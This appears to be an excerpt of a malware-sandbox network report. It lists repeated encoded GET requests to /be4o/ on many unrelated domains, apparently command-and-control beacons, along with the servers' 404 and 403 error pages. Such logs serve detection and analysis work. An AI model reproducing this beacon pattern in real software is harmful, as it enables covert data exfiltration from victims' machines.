      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g HTTP/1.1Host: www.brainymortgage.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026g HTTP/1.1Host: www.janhenningsen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1Host: www.buresdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026g HTTP/1.1Host: www.kaikkistore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:51:30 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 65 34 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /be4o/ was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Feb 2022 15:51:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeSet-Cookie: security_session_verify=a89d9fee5fcc7c3745bbd54a26506816; expires=Thu, 24-Feb-22 23:51:35 GMT; path=/; HttpOnlyData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:52:01 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html;charset=UTF-8Data Raw: 38 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 3a 28 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 62 6f 64 79 20 7b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 09 09 7d 0d 0a 0d 0a 09 09 68 31 20 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 20 30 3b 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 68 32 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 33 30 70 78 20 30 3b 0d 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 09 7d 0d 0a 09 09 09 0d 0a 09 09 75 6c 20 7b 0d 0a 09 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 64 69 73 63 3b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 61 20 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 20 23 46 37 39 33 31 45 3b 0d 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 09 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 61 3a 68 6f 76 65 72 20 7b 0d 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 70 20 7b 0d 0a 09 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 3b 0d 0a 09 09 7d 0d 0a 09 09 0d 0a 09 09 23 6c 6f 67 6f 20 7b 0d 0a 09 09 77 69 64 74 68 3a 20 35 34 30 70 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:52:22 GMTContent-Type: text/htmlContent-Length: 275ETag: "620175f5-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:52:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:53:14 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:53:30 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:53:35 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:54:22 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:54:33 GMTContent-Type: text/htmlContent-Length: 275ETag: "61ffb800-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:55:23 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:55:25 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>
